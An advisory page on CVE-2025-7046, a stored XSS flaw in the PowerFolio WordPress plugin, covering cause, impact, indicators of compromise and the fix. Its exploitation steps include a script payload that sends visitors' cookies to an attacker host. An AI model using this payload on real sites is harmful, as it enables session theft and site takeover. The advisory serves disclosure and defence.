CVE-2025-7046
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-7046 is a Stored Cross-Site Scripting (XSS) vulnerability in the Portfolio for Elementor & Image Gallery | PowerFolio WordPress plugin. It affects all versions up to and including 3.2.0, stemming from insufficient input sanitization and output escaping in the Custom JS Attributes of the plugin's widgets. Authenticated attackers with Contributor-level access or above can inject arbitrary web scripts into pages that execute when any user visits the affected page. The vulnerability was disclosed on July 4, 2025, partially addressed in version 3.2.0, and fully fixed in version 3.2.1. It carries a CVSS v3.1 base score of 5.4 (Medium) (Wordfence, Red Hat CVE).

Technical details

The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically in how the plugin handles Custom JS Attributes within its Elementor widgets (e.g., portfolio_widget.php and image_gallery_widget.php). Because user-supplied input is neither properly sanitized on input nor escaped on output, a contributor-level user can embed malicious JavaScript payloads directly into widget attributes. The attack vector is network-based, requires low privileges (Contributor role), and necessitates user interaction (a victim visiting the injected page) to trigger script execution. Relevant source code locations are publicly visible in the plugin's Trac repository (WordPress Trac - portfolio_widget, WordPress Trac - image_gallery_widget).

Impact

Successful exploitation allows an authenticated attacker with at minimum Contributor-level access to persistently inject malicious scripts into WordPress pages. When other users — including administrators — visit the compromised pages, the injected scripts execute in their browser context, potentially enabling session cookie theft, credential harvesting, keystroke capture, unauthorized actions performed on behalf of victims, or redirection to malicious sites. While availability is not directly impacted, the confidentiality and integrity risks are meaningful, particularly if an administrator's session is hijacked, which could lead to full site compromise (Wordfence, Red Hat CVE).

Exploitability

As of the time of disclosure, there is no public proof-of-concept exploit and no evidence of active in-the-wild exploitation (Wordfence). The EPSS score is approximately 0.03%, reflecting a low probability of near-term exploitation. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been reported.

Exploitation steps

  1. Gain Contributor Access: Register or compromise a WordPress account with at least Contributor-level privileges on a site running PowerFolio ≤ 3.2.0.
  2. Navigate to Page/Post Editor: Open the Elementor editor for a new or existing page/post where the PowerFolio portfolio or image gallery widget can be added.
  3. Insert Malicious Payload: Add a PowerFolio widget (e.g., Portfolio Widget or Image Gallery Widget) and locate the "Custom JS Attributes" field in the widget settings. Inject a malicious JavaScript payload such as "><script>document.location='https://attacker.com/steal?c='+document.cookie</script> into the attribute field.
  4. Publish the Page: Save and publish the page. The unsanitized payload is stored in the WordPress database and rendered without escaping when the page is loaded.
  5. Trigger Execution: When any user (including an administrator) visits the page, the injected script executes in their browser, enabling cookie theft, session hijacking, or other client-side attacks (WordPress Trac - portfolio_widget, Wordfence).

Indicators of compromise

  • Database/Content: WordPress post content or widget metadata containing unexpected <script> tags, JavaScript event handlers (e.g., onerror, onload), or encoded payloads within Custom JS Attribute fields of PowerFolio widgets.
  • Logs: Web server access logs showing requests to pages containing PowerFolio widgets followed by outbound connections to unknown external domains from victim browsers (visible in browser-side proxy or WAF logs).
  • Network: Unusual outbound HTTP/S requests from site visitors' browsers to attacker-controlled domains, particularly carrying cookie or session data as query parameters.
  • File System: No direct file system artifacts expected for stored XSS; however, review the WordPress database (wp_posts, wp_postmeta) for suspicious JavaScript strings in widget settings.

Mitigation and workarounds

The primary remediation is to update the PowerFolio plugin to version 3.2.1 or later, which fully resolves the vulnerability (version 3.2.0 only partially addressed it) (WordPress Trac Changeset, Wordfence). As interim measures, site administrators should restrict Contributor-level user registrations, audit existing contributor accounts for suspicious content, and deploy a Web Application Firewall (WAF) with XSS detection rules. Regularly auditing plugin permissions and limiting the use of Custom JS Attribute fields to trusted users is also recommended.

Community reactions

Wordfence disclosed the vulnerability as part of their weekly WordPress vulnerability report for the period of June 30 – July 6, 2025, and assigned the CVE through their threat intelligence program (Wordfence Weekly Report). The vulnerability was also catalogued by ENISA's EUVD (EUVD-2025-19927) and noted by Red Hat's CVE tracking. No significant independent researcher commentary or broader media coverage has been identified beyond standard vulnerability aggregator listings.

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-15239NONEN/A
  • simple-cloudflare-turnstile
NoYesAug 07, 2026
CVE-2026-15211NONEN/A
  • subscriptions-for-woocommerce
NoYesAug 07, 2026
CVE-2026-15148NONEN/A
  • wp-events-manager
NoYesAug 07, 2026
CVE-2026-16265NONEN/A
  • wp-google-map-plugin
NoYesAug 07, 2026
CVE-2026-16263NONEN/A
  • wp-google-map-plugin
NoYesAug 07, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management